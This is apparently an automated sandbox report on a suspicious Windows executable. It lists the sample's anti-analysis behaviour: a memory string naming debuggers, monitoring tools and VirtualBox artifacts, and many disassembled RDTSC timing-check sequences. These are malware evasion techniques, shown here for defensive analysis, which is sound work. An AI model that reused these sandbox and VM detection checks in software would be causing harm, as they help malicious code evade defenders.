Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B38 second address: 1372B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B3C second address: 1372B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B40 second address: 1372B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B4C second address: 1372B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA278C27B7Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B5C second address: 1372B7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA278C0D023h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA278C0D016h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13773E0 second address: 13773E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1377597 second address: 13775B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007FA278C0D029h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13775B9 second address: 13775BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137B7D5 second address: 137B81B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jmp 00007FA278C0D025h 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ebx 0x00000017 jmp 00007FA278C0D01Bh 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137B88B second address: 137B8D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ecx, dword ptr [ebp+122D3679h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FA278C27B78h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push DF123F37h 0x00000033 jc 00007FA278C27B84h 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c pop edi 0x0000003d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137B8D5 second address: 137B95D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 20EDC149h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FA278C0D018h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jc 00007FA278C0D018h 0x00000031 mov edx, ebx 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FA278C0D018h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f sub edi, 1CF68EA6h 0x00000055 push 00000000h 0x00000057 movsx ecx, bx 0x0000005a mov si, 4F5Ch 0x0000005e push 00000003h 0x00000060 mov esi, dword ptr [ebp+122D3317h] 0x00000066 push 521A2CF6h 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FA278C0D01Dh 0x00000072 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BA25 second address: 137BAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, 26804004h 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 sub edi, 604D33B7h 0x00000017 mov dword ptr [ebp+122D29C6h], edx 0x0000001d popad 0x0000001e push D1A24080h 0x00000023 jmp 00007FA278C27B83h 0x00000028 add dword ptr [esp], 2E5DC000h 0x0000002f movzx esi, ax 0x00000032 push 00000003h 0x00000034 jnp 00007FA278C27B79h 0x0000003a movzx ecx, cx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007FA278C27B78h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 mov di, 4B3Eh 0x0000005d push 00000003h 0x0000005f mov dx, ED45h 0x00000063 push 5DB482A7h 0x00000068 jnl 00007FA278C27B84h 0x0000006e add dword ptr [esp], 624B7D59h 0x00000075 sbb dx, ADFCh 0x0000007a lea ebx, dword ptr [ebp+12449706h] 0x00000080 mov ecx, dword ptr [ebp+122D3721h] 0x00000086 xchg eax, ebx 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b popad 0x0000008c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BAD3 second address: 137BAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BAD7 second address: 137BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BB7D second address: 137BB84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BB84 second address: 137BB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FA278C27B76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BCF1 second address: 137BCF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BCF5 second address: 137BD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA278C27B78h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 137BD07 second address: 137BD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A36B second address: 139A375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A375 second address: 139A37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A37B second address: 139A38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A38F second address: 139A39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA278C0D016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A39B second address: 139A3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FA278C27B84h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A500 second address: 139A508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A640 second address: 139A644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A782 second address: 139A790 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA278C0D01Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A790 second address: 139A79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jnl 00007FA278C27B76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139A93A second address: 139A93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AA6E second address: 139AA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B7Ch 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139ABE2 second address: 139ABE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139ABE8 second address: 139ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139ABEC second address: 139AC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA278C0D025h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AC0D second address: 139AC21 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA278C27B7Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c je 00007FA278C27B82h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AD76 second address: 139AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AD7F second address: 139AD8B instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C27B7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AD8B second address: 139AD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AF05 second address: 139AF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA278C27B76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AF11 second address: 139AF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AF15 second address: 139AF19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2D4 second address: 139B2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2D8 second address: 139B2E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA278C27B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2E2 second address: 139B2EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2EB second address: 139B2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136A352 second address: 136A358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136A358 second address: 136A36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA278C27B76h 0x0000000d jp 00007FA278C27B76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BAB3 second address: 139BADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FA278C0D024h 0x0000000b jmp 00007FA278C0D01Fh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BC04 second address: 139BC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BC08 second address: 139BC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA278C0D016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BD6E second address: 139BD78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA278C27B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139C135 second address: 139C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FA278C0D01Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139C146 second address: 139C14B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139D89C second address: 139D8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D027h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A174A second address: 13A178C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C27B81h 0x00000009 popad 0x0000000a jng 00007FA278C27B85h 0x00000010 jmp 00007FA278C27B7Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA278C27B80h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A178C second address: 13A17A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA278C0D01Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A17A0 second address: 13A17B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A5540 second address: 13A5545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A3FB3 second address: 13A3FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A3FB7 second address: 13A3FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA278C0D01Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A572F second address: 13A5733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A5733 second address: 13A5737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A94CB second address: 13A94DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA278C27B7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8A93 second address: 13A8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8A97 second address: 13A8AE3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B76h 0x00000008 jmp 00007FA278C27B89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FA278C27B76h 0x00000016 js 00007FA278C27B76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f jmp 00007FA278C27B84h 0x00000024 popad 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8AE3 second address: 13A8AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FA278C0D01Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A9324 second address: 13A9344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA278C27B7Ch 0x0000000b pop eax 0x0000000c je 00007FA278C27BA3h 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A9344 second address: 13A9365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FA278C0D029h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AA791 second address: 13AA79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AA982 second address: 13AA988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AAC14 second address: 13AAC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA278C27B76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AB7E8 second address: 13AB7EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AB7EE second address: 13AB7F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13ACA6F second address: 13ACA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13ADC4D second address: 13ADC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AE509 second address: 13AE50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AE5A7 second address: 13AE5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF100 second address: 13AF106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF106 second address: 13AF10A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF96C second address: 13AF988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FA278C0D020h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B0FF2 second address: 13B1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C27B76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FA278C27B76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B1005 second address: 13B1009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B52F7 second address: 13B52FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B52FC second address: 13B5306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA278C0D016h 0x0000000a rdtsc
